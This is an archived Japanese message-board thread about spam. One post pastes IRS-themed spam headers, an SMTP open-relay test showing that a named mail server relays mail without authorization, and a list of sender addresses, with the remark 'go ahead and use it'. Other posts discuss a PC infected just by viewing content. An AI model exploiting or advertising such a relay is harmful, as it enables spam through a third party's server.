Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From 752luq5f5n@msn.com Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

939 :使ってやってくれ:01/10/03 18:13
これ→viking.combination.com


RealBigDeal@postmasterglobal.com

752luq5f5n@msn.com

laurenevallejo1691@excite.com

j310knlqx5d@msn.com

spamspamspam@viking.combination.com



laurenevallejo1691@excite.com

940 :名無しさん@お腹いっぱい。:01/10/03 18:17
SP2入れれば、見ただけ感染しないって嘘ですね。
見事感染しました。大嘘だ!

941 :名無しさん@お腹いっぱい。:01/10/03 20:41
セキュリティの設定レベルの問題では?

232 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)